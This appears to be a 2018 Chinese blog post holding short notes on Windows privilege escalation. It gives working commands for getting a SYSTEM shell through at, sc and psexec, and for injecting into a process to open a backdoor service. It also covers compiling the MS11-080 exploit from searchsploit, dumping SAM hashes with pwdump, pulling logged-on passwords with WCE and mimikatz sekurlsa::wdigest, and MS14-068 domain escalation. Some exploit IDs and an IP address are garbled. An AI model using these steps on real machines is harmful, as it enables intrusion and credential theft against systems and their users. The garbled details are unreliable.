提权

 

 

at  8:00 /interactive cmd.exe    以system用户打开cmd.exe

taskkill explorer

taskadd explorer   以system用户打开桌面

 

sc create syscmd binpath = "cmd /k start" type = own type = interact

sc start syscmd

 

net user administrator /active:yes

 

 

 

tools

https://docs.microsoft.com/zh-cn/sysinternals/

sysinternals工具包    Windows 大神: Mark Russinovich

psExec -i -s cmd.exe

 

pInjector.exe 注入工具

http://www.tarasco.org/security/Process_Injector

pInjector.exe -l

pinjector.exe -p 345 cmd.exe 444      #注入进程345,开启后门服务444 以system用户运行cmd.exe

 

普通用户提权system (利用系统漏洞)

searchsploit ms11-080

searchspoit -m  187176.py

pyinstaller

pywin32

 

py 转 exe

python pyinstaller.py --onefile 18176.py

187176.exe -O xp   

 

PwdDown获取sam哈希值

pwdDump -x 127.0.01pwdDump 127.0.0.1

 

破解sam哈希在线网站

http://www.objectif-securite.ch/ophcrack.php

 

WCE从内存中获取口令工具

另外pwddump.exe 和 wce 在kali的 /usr/share/windows/binary/  /usr/share/wce目录下有

 

wce-universal.exe -h

WCE会读取已经登录的用户密码

 

俄罗斯人写的工具mimikatz_trunk 柠檬

也可以可以获取账号密码

::  两个冒号查看帮助

 

privilege ::   查看privilege帮助

 

privilege::debug   提权到debug权限

 

sekurlsa::

sekurlsa:: wdigest  获取在线用户密码

 

 

ms14-068  普通用户提升至域管理员用户

dcpromo

posted @ 2018-01-04 09:09  Khazix  阅读(345)  评论(0编辑  收藏  举报